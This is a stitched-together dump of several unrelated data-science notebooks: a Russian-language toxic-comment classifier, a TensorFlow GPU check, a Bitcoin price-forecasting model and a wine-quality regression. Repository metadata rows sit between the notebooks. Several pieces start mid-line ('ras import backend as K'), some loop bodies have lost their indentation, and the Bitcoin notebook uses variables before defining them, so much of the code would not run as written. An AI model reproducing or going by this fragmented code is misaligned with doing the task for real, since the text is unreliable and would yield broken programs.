for i in data['text']:
clear = re.sub(r'[^a-zA-Z0-9 ]', ' ', i)
otziv.append(' '.join(clear.split()))
data['clear'] = otziv
data
# -
# Т.к. для обучения 159,5 тыс. строк - слишком большое количество, сделаем sample из 80 тыс.строк
sample = 80000
corpus = data.sample(n = sample, random_state = 1234).reset_index(drop=True)
# Проведем лемматизацию текста при помощи "WordNetLemmatizer"
# +
m = WordNetLemmatizer()
def lemma(corpus):
    """Lemmatize every sentence in *corpus* with the module-level WordNetLemmatizer."""
    lemmatized = []
    for sentence in corpus:
        tokens = nltk.word_tokenize(sentence)
        lemmatized.append(' '.join(m.lemmatize(token) for token in tokens))
    return lemmatized
corpus['lemm_text'] = lemma(corpus['clear'])
corpus
# -
nltk.download('stopwords')
stop_words = set(stopwords.words("english"))
# Напишем функцию, возвращающую словарь с частями речи
def get_wordnet_pos(word):
    """Map an NLTK POS tag's first letter to the matching WordNet POS constant.

    Falls back to NOUN for any tag letter outside {J, N, V, R}.
    """
    first_letter = nltk.pos_tag([word])[0][1][0].upper()
    pos_by_letter = {
        'J': wordnet.ADJ,
        'N': wordnet.NOUN,
        'V': wordnet.VERB,
        'R': wordnet.ADV,
    }
    return pos_by_letter.get(first_letter, wordnet.NOUN)
# Также напишем функцию, лемматизирующую текст с учетом pos_tag
def get_word_text(corpus):
    """Lemmatize each sentence POS-aware while dropping English stop words."""
    processed = []
    for sentence in corpus:
        kept = [
            m.lemmatize(token, get_wordnet_pos(token))
            for token in nltk.word_tokenize(sentence)
            if token not in stop_words
        ]
        processed.append(' '.join(kept))
    return processed
# +
# %%time
nltk.download('punkt')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
corpus['lemma_text'] = get_word_text(corpus['clear'])
# -
corpus.head(15)
# Получили чистый и лемматизированный текст<br>
# Теперь разделим выборку на обучающую и тестовую с применением параметра "stratify".
train, test = train_test_split(corpus, stratify = corpus['toxic'], test_size = 0.20, random_state = 12345)
# Далее рассчитаем TF-IDF. Не забудем, что функцию "fit_transform" нужно запускать только на обучающей выборке, чтобы в модели не были учтены частоты слов из тестовой выборки.
# +
train['lemma_text'] = train['lemma_text'].values.astype('U')#.toarray()
test['lemma_text'] = test['lemma_text'].values.astype('U')#.toarray()
count_tf_idf = TfidfVectorizer(stop_words=stop_words)
tf_idf_train = count_tf_idf.fit(train['lemma_text'])
tf_idf_train = count_tf_idf.transform(train['lemma_text'])
tf_idf_test = count_tf_idf.transform(test['lemma_text'])
# tf_idf_test = count_tf_idf.transform(test['lemm_text'].values.astype('U')).toarray()
print('Размер обучающей выборки:', tf_idf_train.shape)
print('Размер тестовой выборки:', tf_idf_test.shape)
# -
# Перейдем к обучению.
# ## Обучение
# ### Логистическая регрессия
model_linear = LogisticRegression(random_state = 123, class_weight = 'balanced')
model_linear.fit(tf_idf_train, train['toxic'])
prediction = model_linear.predict(tf_idf_test)
print('F1-мера:', f1_score(prediction, test['toxic']))
# 0.72 < 0.75... Едем дальше
# +
# %%time
parameters = {'C': np.linspace(0.01, 130, 10), 'class_weight': ['balanced']}
grid_search = GridSearchCV(estimator = LogisticRegression(), param_grid = parameters, n_jobs = -1, cv = 5)
grid_search.fit(tf_idf_train, train['toxic'])
grid_search.best_params_
# -
model_linear_01 = LogisticRegression(**grid_search.best_params_, random_state = 123)
model_linear_01.fit(tf_idf_train, train['toxic'])
pred_test = model_linear_01.predict(tf_idf_test)
print('F1-мера:', f1_score(pred_test, test['toxic']))
# При подборе параметра регуляризации "С" результат близок. Возможно, он был бы достигнут при большем объеме сэмпла. Однако, продолжим
# +
# %%time
model_linear = LogisticRegression(random_state = 123, class_weight = 'balanced')
model_linear.fit(tf_idf_train, train['toxic'])
probabilities_train = model_linear.predict_proba(tf_idf_train)
probabilities_one_train = probabilities_train[:, 1]
f1_best = 0
best_threshold = 0
for threshold in np.arange(0.5, 1, 0.02):
predicted_train = probabilities_one_train > threshold
f1 = f1_score(predicted_train, train['toxic'])
if f1 > f1_best:
f1_best = f1
best_threshold = threshold
print('F1-мера:', f1_best,'Оптимальный порог классификации:', best_threshold)
# -
# Теперь попробуем на тестовых данных.
model_linear = LogisticRegression(random_state = 123, class_weight = 'balanced')
model_linear.fit(tf_idf_train, train['toxic'])
probabilities_test = model_linear.predict_proba(tf_idf_test)
probabilities_one_test = probabilities_test[:, 1]
predicted_test = probabilities_one_test > best_threshold
f1 = f1_score(predicted_test, test['toxic'])
print('F1-мера:', f1,'| При пороге классификации: 0.60')
# **BINGO! Значение меры достигнуто. F1 > 0.75**
# ### Дерево решений
# Для проведения перекрестной проверки создадим свой скорер F1
f1 = make_scorer(f1_score)
# +
# %%time
model_tree = DecisionTreeClassifier(random_state = 12345)
pred = cross_val_score(model_tree, tf_idf_train, train['toxic'], cv = 5, scoring = f1)
print('F1-мера:', pred.mean())
# -
# Дерево решений отрабатывает плохо.
# Попробуем обучить дерево решений при помощи GridSearchCV
# +
model_tree = DecisionTreeClassifier(random_state = 1234)
param = {'max_depth': range(1, 30)}
grid_tree = GridSearchCV(model_tree, param, cv=5, scoring = f1, verbose = False)
grid_tree.fit(tf_idf_train, train['toxic'])
grid_tree.best_params_
# -
model_tree = DecisionTreeClassifier(**grid_tree.best_params_, random_state = 123)
model_tree.fit(tf_idf_train, train['toxic'])
predict_test = model_tree.predict(tf_idf_test)
print('F1-мера:', f1_score(predict_test, test['toxic']))
# Дерево решений по-прежнему отрабатывает плохо
# ### Случайный лес
# +
# %%time
model_forest = RandomForestClassifier(random_state = 1234)
param = {'n_estimators': [1, 30, 3],
'max_depth': [2, 20, 2]}
grid_forest = GridSearchCV(model_forest, param, cv=5, scoring = f1, verbose = False)
grid_forest.fit(tf_idf_train, train['toxic'])
f1 = grid_forest.best_score_
print('F1:', f1)
# -
# Мера значительно ниже уже полученных значений. Не будем запускать на тест
# ### CatBoostClassifier
# +
# %%time
text_features = ['lemma_text']
model_cat_01 = CatBoostClassifier(verbose = 50,
loss_function='Logloss',
eval_metric = 'F1',
iterations=1000,
learning_rate=0.2,
random_seed = 0)
model_cat_01.fit(tf_idf_train, train['toxic'])
prediction = model_cat_01.predict(tf_idf_test)
print("F1-мера:", f1_score(prediction, test['toxic']))
# -
# F1 = 0.74 - слишком низкий показатель для такого количества времени
# ## Выводы
# Был проведен анализ данных, в течение которого было выяснено, что баланс классов сильно нарушен: 90% - отрицательных отзывов против 10% положительных.<br>
# Проведена очистка и лемматизация английских слов (в том числе при помощи "pos_tag")<br>
# В ходе обучения моделей, был получен наилучший результат F1-меры у модели логистической регрессии со сбалансированным весом классов и с измененным порогом классификации до 0,6. Результат был достигнут и составляет 0.754.
| 10,617 |
/gputest.ipynb
|
695301bcc7986262e60b30b2ed3576b97fa196e4
|
[] |
no_license
|
kahgeh/ecstensorflow
|
https://github.com/kahgeh/ecstensorflow
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 4,450 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + language="bash"
# cat <<EOF > gputest.py
# import tensorflow as tf
#
# with tf.device('/gpu:0'):
# a = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[2, 3], name='a')
# b = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[3, 2], name='b')
# c = tf.matmul(a, b)
# # Creates a session with log_device_placement set to True.
# sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
# # Runs the op.
# print(sess.run(c))
# EOF
# + language="bash"
# python gputest.py
# -
ras import backend as K
plt.style.use('fivethirtyeight')
plt.rcParams['font.size'] = 10
plt.rcParams['axes.labelsize'] = 10
plt.rcParams['axes.labelweight'] = 'bold'
plt.rcParams['axes.titlesize'] = 10
plt.rcParams['xtick.labelsize'] = 8
plt.rcParams['ytick.labelsize'] = 8
plt.rcParams['legend.fontsize'] = 10
plt.rcParams['figure.titlesize'] = 12
# %matplotlib inline
# +
# util function
def plot_distributions(X):
    """Plot the value distribution of every column of *X*, one facet per column."""
    melted = pd.melt(X)
    grid = sns.FacetGrid(melted, col="variable", col_wrap=3, sharex=False, sharey=False)
    grid.map(sns.distplot, "value")
def plot_missing_values(X):
    """Bar-chart the missing-value count for each column that has any."""
    counts = X.isnull().sum()
    counts = counts[counts > 0].sort_values()
    counts.plot.bar()
def spearman(frame, features=None, target='y'):
    """Bar-plot the Spearman correlation of each feature with *target*.

    Parameters
    ----------
    frame : pd.DataFrame
        Data containing both the features and the target column.
    features : sequence of str, optional
        Columns to correlate. None (the default) means no features; this
        replaces the original mutable-list default argument.
    target : str
        Name of the target column in *frame*.
    """
    features = [] if features is None else list(features)
    spr = pd.DataFrame()
    spr['feature'] = features
    spr['spearman'] = [frame[f].corr(frame[target], 'spearman') for f in features]
    spr = spr.sort_values('spearman')
    plt.figure(figsize=(6, 0.25 * len(features)))
    sns.barplot(data=spr, y='feature', x='spearman', orient='h')
def plot_corr_heatmap(X, title="Corr Heatmap"):
    """Draw a lower-triangle annotated heatmap of the correlation matrix of *X*."""
    X_corr = X.corr()
    plt.figure(figsize=(20, 7))
    # Add title
    plt.title(title)
    # Plain builtin bool: np.bool was deprecated in NumPy 1.20 and removed
    # in 1.24, so the original raised AttributeError on modern NumPy.
    mask = np.zeros_like(X_corr, dtype=bool)
    # Hide the upper triangle — it mirrors the lower one.
    mask[np.triu_indices_from(mask)] = True
    cmap = sns.diverging_palette(220, 10, as_cmap=True)
    sns.heatmap(mask=mask, data=X_corr, annot=True, cmap=cmap)
def pairplot_with_target(X, features, target):
    """Facet grid of the mean of *target* versus each feature, one panel each."""
    def _mean_line(x, y, **kwargs):
        # Average the target per unique feature value and draw a line plot.
        ax = plt.gca()
        averaged = pd.DataFrame({'time': x, 'val': y}).groupby('time').mean()
        averaged.plot(ax=ax)
        plt.xticks(rotation=90)
    melted = pd.melt(X, id_vars=[target], value_vars=features)
    grid = sns.FacetGrid(melted, col="variable", col_wrap=3, sharex=False, sharey=False, size=5)
    grid.map(_mean_line, "value", target)
# -
# ## PART 1
#
# ### 1)
# +
#read datasets
btc_price = pd.read_csv('../data/BTCPrice.csv', index_col=['Date'])
btc_price.columns = ['PRICE']
btc_trd_vol = pd.read_csv('../data/BTCTradeVolume.csv', index_col=['Date'])
btc_trd_vol.columns = [ 'TRD_VOLUME']
btc_miner_fees = pd.read_csv('../data/BTCtransaction-fees.csv', index_col=['Date'])
btc_miner_fees.columns = ['MINERS_FEE']
btc_transaction_vol = pd.read_csv('../data/BTCTransactionVolume.csv', index_col=['Date'])
btc_transaction_vol.columns = ['TRAN_VOL']
btc_price_vol = pd.read_csv('../data/BTCprice-volatility.csv', index_col=['Date'])
btc_price_vol.columns = ['PRICE_VOL']
btc_miner_revenue = pd.read_csv('../data/BTCminer-revenue.csv', index_col=['Date'])
btc_miner_revenue.columns = ['MINERS_REVENUE']
btc_difficulty = pd.read_csv('../data/BTCDifficulty.csv', index_col=['Date'])
btc_difficulty.columns = ['DIFFICULTY']
btc_transaction_per_block = pd.read_csv('../data/BTCTransactionPerBlock.csv', index_col=['Date'])
btc_transaction_per_block.columns = ['TRAN_BLOCK']
btc_hash_rate = pd.read_csv('../data/BTChash-rate.csv', index_col=['Date'])
btc_hash_rate.columns = ['HASH_RATE']
btc_market_cap = pd.read_csv('../data/BTCmarket-cap.csv', index_col=['Date'])
btc_market_cap.columns = ['MARKET_CAP']
bch_price = pd.read_csv('../data/BCHprice.csv', index_col=['Date'])
bch_price.columns = ['BCH_PRICE']
btc_money_supply = pd.read_csv('../data/BTCmoney-supply.csv', index_col=['Date'])
btc_money_supply.columns = ['MONEY_SUPPLY']
btc_data = pd.concat([btc_price, btc_trd_vol, btc_miner_fees, btc_transaction_vol, btc_price_vol,
btc_miner_revenue, btc_difficulty, btc_transaction_per_block, btc_hash_rate,
btc_money_supply, bch_price, btc_market_cap], axis=1, sort=True)
btc_data.index= pd.to_datetime(btc_data.index, format='%Y-%m-%d')
btc_data = btc_data.loc[(btc_data.index >= '2010-01-01') & (btc_data.index <= '2019-06-30')]
# -
engineered_features = ['ma7', '14sd']
btc_data['ma7'] = btc_data['PRICE'].rolling(7).mean()
btc_data['14sd'] = btc_data['PRICE'].rolling(14).std()
base_features = list(btc_data.columns)
plot_missing_values(btc_data)
#
# 0 price does not make sense in the beginning of 2010. Its probably due to the lack of trading on exchanges at that time. It would be best to drop rows with 0 price or 0 trade volume. Since prices with 0 trading volume are also not reliable. Removing 0 price value also takes care of the missing value in the above columns.
#
btc_data = btc_data.drop(btc_data[btc_data['PRICE']==0].index)
btc_data.describe()
# ### 2)
plt.figure(figsize=(16,6))
plt.title('BTC Price Chart')
sns.lineplot(btc_data.index, btc_data['PRICE'], label='price')
plt.xlabel('date')
# ### 2 & 3)
# +
#feature engineering
# lets split our data set before we do analysis on data set to make testing phase completely independent
target = 'PRICE'
train_mask = (btc_data.index >= '2010-01-01') & (btc_data.index <= '2018-06-30')
valid_mask = (btc_data.index >= '2018-07-01') & (btc_data.index <= '2018-12-31')
test_mask = (btc_data.index >= '2019-01-01') & (btc_data.index <= '2019-06-30')
X_train_act = btc_data.loc[train_mask][base_features]
y_train_act = pd.DataFrame(btc_data.loc[train_mask][target])
X_valid_act = pd.DataFrame(btc_data.loc[valid_mask][base_features])
y_valid_act = pd.DataFrame(btc_data.loc[valid_mask][target])
X_test_act = btc_data.loc[test_mask][base_features]
y_test_act = pd.DataFrame(btc_data.loc[test_mask][target])
missing = X_train.isnull().sum()
missing = missing[missing > 0]
missing.sort_values(inplace=True)
# +
#using constant imputer for price volatility and standard scaler for normalization
constant_imputer = SimpleImputer(strategy='constant')
#normalizer
normalizer = StandardScaler()
y_normalizer = StandardScaler()
def preprocessing_pipeline(X, train=False):
    """Impute then standardize *X*, restoring its original index.

    The transformers are fitted only when train=True so that test-set
    statistics never leak into the imputer or the scaler.
    """
    original_index = X.index
    impute = constant_imputer.fit_transform if train else constant_imputer.transform
    scale = normalizer.fit_transform if train else normalizer.transform
    X = pd.DataFrame(impute(X), columns=base_features)
    X = pd.DataFrame(scale(X), columns=base_features)
    X.index = original_index
    return X
def y_preprocessing_pipeline(y, train=False):
    """Standardize the target column, fitting the scaler only on the train split."""
    original_index = y.index
    scale = y_normalizer.fit_transform if train else y_normalizer.transform
    y = pd.DataFrame(scale(y), columns=[target])
    y.index = original_index
    return y
# +
X_train = preprocessing_pipeline(X_train_act, train=True)
X_valid = preprocessing_pipeline(X_valid_act, train=False)
X_test = preprocessing_pipeline(X_test_act, train=False)
y_train = y_preprocessing_pipeline(y_train_act, train=True)
y_valid = y_preprocessing_pipeline(y_valid_act, train=False)
y_test = y_preprocessing_pipeline(y_test_act, train=False)
# -
import scipy.stats as st
plt.figure(1); plt.title('Johnson SU')
sns.distplot(y_train, kde=False, fit=st.johnsonsu)
plt.figure(2); plt.title('Normal')
sns.distplot(y_train, kde=False, fit=st.norm)
plt.figure(3); plt.title('Log Normal')
sns.distplot(y_train, kde=False, fit=st.lognorm)
pairplot_with_target(btc_data, list(set(base_features) - set(['PRICE'])), 'PRICE')
# We can see some linear relationship of target variable with features
plot_distributions(btc_data)
# Prices, price_vol, hash_rate, TRAN_VOL appear to be following lognormal distribution. We can make log transformation to make distributions bit symmetrical
# +
#plot all columns in same chart
plt.figure(figsize=(16,6))
sns.lineplot(data=X_train, dashes=False)
# -
# ### 4)
plot_corr_heatmap(X_train)
X_train.corr()
## pair plot of all variable with each other and target
sns.pairplot(btc_data, size = 3.5)
# highly correlated
#
# 1)Money supply and transections per block
#
# 2)BCH price and transections per block
#
# 4) hashrate and difficulty are almost perfectly correlated(we should drop one of thesse)
#
# 5) miners fee and bch price
#
# 6) transections per block and bch price
#
# Negatively corr
#
# 1) Miners revenue and transections per block
#
# 2) Miners revenue and money supply(number of bitcoins)
#
#
# We should drop difficulty as it is highly correlated with hashrate and trd volume.
#
X_train = X_train.drop(['DIFFICULTY'], axis=1)
X_test = X_test.drop(['DIFFICULTY'], axis=1)
X_valid = X_valid.drop(['DIFFICULTY'], axis=1)
base_features = list(set(base_features )- set(['DIFFICULTY']))
# ### Observations
#
# 1) We have missing values for price volatility
#
# 2) Std dev of most of the columns is pretty high since 2010
#
# 3) We should reduce highly correlated features (this can be done using greedy algorithms or relying on L1 regularization of NNs)
#
# 4) Standardised features are not stationary which is evident from high shocks(non constant volatility) in the time series plot.
#
#
# ## Part 2
#
# Basic Pre processing and split done in sub parts 2,3 of Part 1.
#
# Now, lets do feature engineering to derive more predictors from past 28 days.
# First lets concat features from last 28 days and also create
#
# +
#### data processing Utils
def create_lagged_features(X, features, lag=3, dropna=False):
    """Build a wide frame of lagged copies of *X* for time-series modelling.

    For each offset ``i`` in ``0 .. lag-1`` the frame is shifted down by
    ``i`` rows and its columns are suffixed with ``_i``; all shifted copies
    are concatenated side by side.  The first ``lag - 1`` rows contain NaNs
    unless ``dropna`` is True.  (``features`` is accepted for interface
    compatibility but is not used.)
    """
    shifted = pd.concat(
        [X.shift(offset).add_suffix('_' + str(offset)) for offset in range(lag)],
        axis=1,
    )
    return shifted.dropna() if dropna else shifted
def create_leading_targets(X, lead=3, dropna=False):
    """Build leading (future) copies of *X* for multi-step-ahead targets.

    Column ``<name>_i`` holds the value ``i`` rows ahead, for
    ``i = 1 .. lead``; the trailing ``lead`` rows contain NaNs unless
    ``dropna`` is True.
    """
    led = pd.concat(
        [X.shift(-step).add_suffix('_' + str(step)) for step in range(1, lead + 1)],
        axis=1,
    )
    return led.dropna() if dropna else led
# -
lag = 28
# +
X_train_lagged = create_lagged_features(X_train, base_features,lag=lag)[lag:-7]
y_train_leading = create_leading_targets(pd.DataFrame(y_train), lead=7)[lag:-7]
X_valid_lagged = create_lagged_features(X_valid, base_features,lag=lag)[lag:-7]
y_valid_leading = create_leading_targets(pd.DataFrame(y_valid), lead=7)[lag:-7]
X_test_lagged = create_lagged_features(X_test, base_features, lag=lag)[lag:-7]
y_test_leading = create_leading_targets(pd.DataFrame(y_test), lead=7)[lag:-7]
# -
# we will start trading after 28 days and also stop trading 7 days before to avoid handling NaN cases
#
# Let's verify whether the input features are based on a 28-day look-back period and the targets on the following periods
# On 2018-06-19, we are using the prices and features from past 28 days to predict next 7 days prices. PRICE_1 is next day price and price 0 is the current day price.
# ## Part 3
# Now that our data sets are ready lets start training.
#
# But before that lets create score function
def get_model_score(model, X, y_true):
    """MAE between predictions and truth on the original (un-normalised) price scale.

    Relies on the module-level ``y_normalizer`` to undo the target scaling
    before scoring, so the error is reported in actual price units.
    """
    predicted = pd.DataFrame(y_normalizer.inverse_transform(model.predict(X)))
    actual = pd.DataFrame(y_normalizer.inverse_transform(y_true))
    return mean_absolute_error(predicted, actual)
# ### 1) Average and Last Value model
# +
def get_avg_model_preds(data, target):
    """Benchmark model: predict each of the next 7 days as the 28-day rolling mean.

    Fix: the original read the module-level ``btc_data`` instead of the
    ``data`` argument, so the parameter was silently ignored.  Alignment
    still depends on the module-level ``y_valid_leading`` index
    (validation rows only).
    """
    y_preds = data[target].rolling(28).mean().loc[y_valid_leading.index]
    # One identical column per forecast horizon (t+1 .. t+7).
    return pd.concat([y_preds] * 7, axis=1)
def get_last_val_preds(data, target):
    """Benchmark model: predict each of the next 7 days as yesterday's value.

    Alignment depends on the module-level ``y_valid_leading`` index
    (validation rows only).
    """
    lagged = data[target].shift(1)
    aligned = lagged.loc[y_valid_leading.index]
    # One identical column per forecast horizon (t+1 .. t+7).
    return pd.concat([aligned] * 7, axis=1)
last_val_preds = get_last_val_preds(btc_data, target)
avg_model_preds = get_avg_model_preds(btc_data, target)
unnorm_y_valid = y_normalizer.inverse_transform(y_valid_leading)
print("avg benchmark score: ", mean_absolute_error(unnorm_y_valid, avg_model_preds))
print("last val benchmark score: ", mean_absolute_error(unnorm_y_valid, last_val_preds))
plt.figure(figsize=(16,6))
plt.title('Average Model Validation Predictions(t+1)')
sns.lineplot(y_valid_leading.index, avg_model_preds.iloc[:,0], label='predicted price')
sns.lineplot(y_valid_leading.index, unnorm_y_valid[:, 0], label='actual price')
plt.xlabel('date')
# +
plt.figure(figsize=(16,6))
plt.title('Last Value Validation Predictions(T+1)')
sns.lineplot(y_valid_leading.index, last_val_preds.iloc[:,0], label='predicted price')
sns.lineplot(y_valid_leading.index, unnorm_y_valid[:, 0], label='actual price')
plt.xlabel('date')
# -
# ### 2) simple neural network
# ## Tune N (look back period)
# +
from tensorflow import set_random_seed
from keras.regularizers import l1
set_random_seed(2)
# imp_features = ['PRICE_0', 'PRICE_1', 'PRICE_2', 'PRICE_3', 'PRICE_4', 'PRICE_5', 'PRICE_6', 'PRICE_7',
# 'HASH_RATE_0','MINERS_REVENUE_0',
# 'ma7_0', '14sd_0']
# X_train_lagged_new = X_train_lagged[imp_features]
# X_valid_lagged_new = X_valid_lagged[imp_features]
scores = {'N': [],
'mae': []}
def train_simple_nn(X_train, y_train, X_valid, y_valid, lag=28, epochs=10, batch_size=50):
    """Train a two-hidden-layer MLP on lagged features and return the validation MAE.

    Features use a ``lag``-day look-back and targets are the next 7 days;
    the first ``lag`` rows and the last 7 rows are trimmed to drop the NaNs
    produced by shifting.  Relies on the module-level ``base_features`` and
    ``get_model_score``.
    """
    Xtr = create_lagged_features(X_train, base_features, lag=lag)[lag:-7]
    ytr = create_leading_targets(pd.DataFrame(y_train), lead=7)[lag:-7]
    Xva = create_lagged_features(X_valid, base_features, lag=lag)[lag:-7]
    yva = create_leading_targets(pd.DataFrame(y_valid), lead=7)[lag:-7]

    net = Sequential()
    net.add(Dense(50, input_dim=Xtr.shape[1], activation='relu'))
    net.add(Dense(50, activation='relu'))
    net.add(Dense(7))  # one output per forecast horizon (t+1 .. t+7)
    net.compile(loss='mae', optimizer='adam', metrics=['accuracy'])
    net.fit(Xtr, ytr, verbose=0, epochs=epochs, batch_size=batch_size)
    return get_model_score(net, Xva, yva)
n = range(3, 28, 3)
for i in n:
curr_score = train_simple_nn(X_train, y_train, X_valid, y_valid, lag=i, epochs=10, batch_size=50)
scores['N'].append(i)
scores['mae'].append(curr_score)
# -
pd.DataFrame(scores)
# ## Tuning epoch and batch size
epochs = range(10, 100, 20)
batch = range(20, 200, 30)
scores = {'epoch': [],
'batch': [],
'mae': []}
for e in epochs:
for b in batch:
print(e, b)
curr_score = train_simple_nn(X_train, y_train, X_valid, y_valid, lag=6, epochs=e, batch_size=b)
scores['epoch'].append(e)
scores['batch'].append(b)
scores['mae'].append(curr_score)
pd.DataFrame(scores)
# ### Final tuned model
# N = 6
#
# e = 50
#
# batch_size = 20
# +
lag=6
X_train_lagged = create_lagged_features(X_train, base_features,lag=lag)[lag:-7]
y_train_leading = create_leading_targets(pd.DataFrame(y_train), lead=7)[lag:-7]
X_valid_lagged = create_lagged_features(X_valid, base_features,lag=lag)[lag:-7]
y_valid_leading = create_leading_targets(pd.DataFrame(y_valid), lead=7)[lag:-7]
# -
X_test_lagged = create_lagged_features(X_test, base_features, lag=lag)[lag:-7]
y_test_leading = create_leading_targets(pd.DataFrame(y_test), lead=7)[lag:-7]
simple_nn = Sequential()
simple_nn.add(Dense(50, input_dim=X_train_lagged.shape[1], activation='relu'))
simple_nn.add(Dense(50, activation='relu'))
simple_nn.add(Dense(7))
simple_nn.compile(loss='mae', optimizer='adam', metrics=['accuracy'])
h = simple_nn.fit(X_train_lagged, y_train_leading, epochs=50, batch_size=20,
validation_data=(X_valid_lagged, y_valid_leading), shuffle=False)
y_valid_pred = simple_nn.predict(X_valid_lagged)
print("simple nn un-normalized validation mae score: ",
get_model_score(simple_nn, X_valid_lagged, y_valid_leading))
plt.plot(h.history['loss'], label='SimpleNN train', color='brown')
plt.plot(h.history['val_loss'], label='SimpleNN valid', color='blue')
plt.legend()
plt.show()
# +
# plot actual and predicted value for N+1 period
# -
unnormalised_y_valid_pred = y_normalizer.inverse_transform(y_valid_pred)
unnorm_y_valid = y_normalizer.inverse_transform(y_valid_leading)
plt.figure(figsize=(16,6))
plt.title('Simple NN Model Validation Predictions(t+1)')
sns.lineplot(y_valid_leading.index, unnormalised_y_valid_pred[:,0], label='predicted price t+1')
sns.lineplot(y_valid_leading.index, unnorm_y_valid[:, 0], label='actual price')
plt.xlabel('date')
# score on validation set
scores = simple_nn.evaluate(X_valid_lagged, y_valid_leading, verbose=0)
print("Accuracy: " + str(scores))
# saving normalizer
from sklearn.externals import joblib
joblib.dump(y_normalizer, 'price_normalizer.pkl')
# +
#saving deep learning model
# -
joblib.dump(simple_nn, 'simple_nn.pkl')
# +
X_train_lagged.to_csv('X_train_lagged.csv')
y_train_leading.to_csv('y_train_leading.csv')
X_valid_lagged.to_csv('X_valid_lagged.csv')
y_valid_leading.to_csv('y_valid_leading.csv')
X_test_lagged.to_csv('X_test_lagged.csv')
y_test_leading.to_csv('y_test_leading.csv')
# -
| 17,938 |
/Modeling_and_Validation/notebooks/ROC.v1.ipynb
|
90f368e17fefe005568293cf5059f2f1cc8cdd7b
|
[] |
no_license
|
jplineb/Watson-Precision-Agriculture
|
https://github.com/jplineb/Watson-Precision-Agriculture
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 2,527 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Abrindo a caixa preta dos algoritmos de ML
#
#
# ### Motivação
#
# Vimos que existem algoritmos de alta interpretabilidade como regressões lineares e arvores de decisão simples. Mas nem sempre (quase nunca) esses algoritmos simples são os que retornam os melhores resultados preditivos (os menores valores na nossa curva de custo). E ficamos nesse impasse, usar algoritmos simples para conseguir explicar como ele chegou nos resultados (e ter mais confiança da área não técnica) ou usar algoritmos super poderosos que não temos a minima ideia de como ele chegou em um resultado qualquer?
#
#
# Uma saída para isso é usar as duas abordagens. Usa-se um algoritmo simples para sabermos o que está acontecendo e um mais poderoso que é uma caixa-preta para fazer previsões.
#
#
# Outra saída é tentarmos abrir a caixa preta e entender o que se passa lá.
#
# Vamos usar um dataset com caracteristicas de vinhos para treinarmos esses conceitos.
#
#
# #### O problema
# O presente problema se refere aos dados de vinhos portugueses "Vinho Verde", que possuem
# variantes de vinho branco e tinto. Devido a questões de privacidade, apenas variáveis
# físico-químicas (input) e sensoriais (output) estão disponíveis (por exemplo, não há dados
# sobre tipo de uva, marca do vinho, preço de venda, etc).
#
# #### Objetivo
# Criar um modelo para estimar a qualidade do vinho.
# Informação sobre os atributos
# Variáveis input (baseado em testes físico-químicos):
# 1. Tipo
# 2. Acidez fixa
# 3. Volatilidade da acidez
# 4. Ácido cítrico
# 5. Açúcar residual
# 6. Cloretos
# 7. Dióxido de enxofre livre
# 8. Dióxido de enxofre total
# 9. Densidade
# 10. pH
# 11. Sulfatos
# 12. Álcool
#
# #### Variável output/target (baseado em dado sensorial):
# Qualidade (score entre 0 and 10)
# +
# %matplotlib inline
import math
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import statsmodels.api as sm
import statsmodels.formula.api as smf
from io import StringIO
wine=pd.read_csv("winequality.csv",sep=';')
wine.head()
# -
wine.describe()
# Fix the data-entry error (alcohol == 97.333 should be 9.7333).
# The original used chained indexing (wine[mask]['alcohol'] = ...), which
# assigns into a temporary copy and leaves `wine` unchanged; .loc applies
# the correction in place.
wine.loc[wine.alcohol == 97.333000, 'alcohol'] = 9.7333000
wine['type'].value_counts()
wine.shape
wine.drop_duplicates().shape
wine.isnull().sum()
red_counts=wine.groupby('quality').size()
plt.xlabel("Qualidade")
plt.ylabel("Quantidade")
plt.title('Histograma Distribuição das notas')
red_counts.plot(kind='bar', color='b')
plt.show()
print("white mean = ", wine[wine['type']=='Red']["quality"].mean())
print("red mean =", wine[wine['type']=='White']["quality"].mean())
sns.pairplot(wine.drop_duplicates(), hue='type')
plt.subplots(figsize=(20,15))
ax = plt.axes()
ax.set_title("Wine Characteristic Correlation Heatmap (Reds)")
corr = wine.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
annot=True)
plt.show()
wine.rename(columns={'fixed acidity': 'fixed_acidity','citric acid':'citric_acid','volatile acidity':'volatile_acidity','residual sugar':'residual_sugar','free sulfur dioxide':'free_sulfur_dioxide','total sulfur dioxide':'total_sulfur_dioxide'}, inplace=True)
wine.dtypes
# +
function1 = '''
quality ~ total_sulfur_dioxide
+ free_sulfur_dioxide
+ residual_sugar
+ fixed_acidity
+ volatile_acidity
+ alcohol
+ citric_acid
+ sulphates
+ chlorides
+ pH
+ density
+ C(type)
'''
results1 = smf.ols(function1, data=wine).fit()
print(results1.summary())
# +
from sklearn.model_selection import train_test_split
wine_w_dummies = pd.get_dummies(wine)
X = wine_w_dummies.drop('quality', axis=1)
y = wine_w_dummies['quality']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)
# +
from sklearn.tree import DecisionTreeRegressor
from sklearn import metrics
dtr = DecisionTreeRegressor(max_depth=4)
dtr.fit(X_train,y_train)
yhat = dtr.predict(X_test)
r2 = metrics.r2_score(y_test,yhat)
mse = metrics.mean_squared_error(y_test,yhat)
print(f'r2: {round(r2,4)}, mse:{round(mse,4)}')
# +
from sklearn.tree import export_graphviz
import pydotplus
from IPython.display import Image
dot_data = StringIO()
export_graphviz(dtr,
out_file=dot_data,
filled=True,
rounded=True,
special_characters=True,
feature_names=list(X))
graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
Image(graph.create_png())
# +
from sklearn.ensemble import GradientBoostingRegressor
gbr = GradientBoostingRegressor(max_depth=4, n_estimators=1000)
